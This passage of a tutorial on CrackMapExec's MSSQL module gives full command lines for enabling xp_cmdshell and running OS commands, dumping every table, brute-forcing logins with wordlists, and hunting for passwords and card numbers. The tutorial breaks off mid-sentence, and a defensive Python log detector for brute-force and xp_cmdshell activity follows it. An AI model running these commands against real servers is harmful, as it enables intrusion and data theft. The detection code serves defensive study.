query: Execute a SQL query on the target database and display the results.
enable_xp_cmdshell: Enable the xp_cmdshell stored procedure on the target database, which allows executing arbitrary commands on the database server.
disable_xp_cmdshell: Disable the xp_cmdshell stored procedure on the target database.
dump: Dump the contents of a specific table or all tables from the target database.
brute: Perform a brute-force attack on the target database using a wordlist of usernames and passwords.
spider: Spider the target database and look for sensitive information such as passwords, credit card numbers, etc.
How to Use the --mssql Module?
To use the --mssql module, you need to have valid credentials for the target database. You can obtain them by using other CME modules such as --smb, --wmi, or --kerberos, or by using other tools such as Mimikatz or Impacket. Once you have the credentials, you can use the following syntax to run the --mssql module:
cme mssql <target> -u <username> -p <password> -d <database> --<action> <options>
For example, to execute a SQL query on the target database, you can use:
cme mssql 192.168.1.10 -u sa -p P@ssw0rd -d master --query "SELECT @@version"
This will display the version of the SQL Server running on the target machine. To enable the xp_cmdshell stored procedure and execute a command on the target machine, you can use:
cme mssql 192.168.1.10 -u sa -p P@ssw0rd -d master --enable_xp_cmdshell
cme mssql 192.168.1.10 -u sa -p P@ssw0rd -d master --query "EXEC xp_cmdshell 'whoami'"
This will display the user running the SQL Server service on the target machine. To dump all tables from the target database, you can use:
cme mssql 192.168.1.10 -u sa -p P@ssw0rd -d master --dump
This will create a folder named cmedb-<target> in your current directory and save all tables as CSV files in it. To perform a brute-force attack on the target database, you can use:
cme mssql 192.168.1.10 --brute /usr/share/wordlists/usernames.txt /usr/share/wordlists/passwords.txt
This will try all combinations of usernames and passwords from the wordlists and report any valid credentials found. To spider the target database and look for sensitive information, you can use:
cme mssql 192.168.1.10 -u sa -p P@ssw0rd -d master --spider
This will scan all tables and columns in the target database and look
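The brute-force and xp_cmdshell actions described above leave traces in the SQL Server error log, and the following added example (not part of the original page or of CME) flags both. It assumes failed-login auditing is on and that the log uses the usual ERRORLOG message layout; the sample lines, addresses, thresholds and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed ERRORLOG excerpt (documentation addresses, not from a real server).
SAMPLE_LOG = """\
2024-05-01 10:00:01.12 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.0.2.50]
2024-05-01 10:00:01.48 Logon       Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 192.0.2.50]
2024-05-01 10:00:02.03 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.0.2.50]
2024-05-01 10:00:02.51 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.0.2.50]
2024-05-01 10:00:03.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.0.2.50]
2024-05-01 10:07:44.90 Logon       Login failed for user 'report'. Reason: Password did not match that for the login provided. [CLIENT: 192.0.2.77]
2024-05-01 10:09:15.27 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-05-01 10:09:15.31 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-05-01 10:12:40.02 spid55      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

FAILED = re.compile(r"^(\S+ \S+) Logon\s+Login failed for user '[^']*'.*\[CLIENT: ([^\]]+)\]")
XP_CMD = re.compile(r"^(\S+ \S+) \S+\s+Configuration option 'xp_cmdshell' changed from 0 to 1")

def _ts(text):
    # ERRORLOG timestamps carry hundredths of a second; %f accepts 1-6 digits.
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S.%f")

def analyze(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return (clients with >= threshold failed logins inside window, xp_cmdshell enable times)."""
    failures, enabled = defaultdict(list), []
    for line in log_text.splitlines():
        if m := FAILED.match(line):
            failures[m.group(2).strip()].append(_ts(m.group(1)))
        elif m := XP_CMD.match(line):
            enabled.append(_ts(m.group(1)))
    noisy = set()
    for client, times in failures.items():
        times.sort()
        # Sliding window: compare each failure with the one threshold-1 positions later.
        for first, last in zip(times, times[threshold - 1:]):
            if last - first <= window:
                noisy.add(client)
                break
    return sorted(noisy), enabled

if __name__ == "__main__":
    sources, enabled = analyze(SAMPLE_LOG)
    print("possible password guessing from:", sources)
    print("xp_cmdshell enabled at:", [t.isoformat() for t in enabled])
```

On a server where xp_cmdshell is never used legitimately, any 0 to 1 change is worth an alert on its own, independent of the login-failure count.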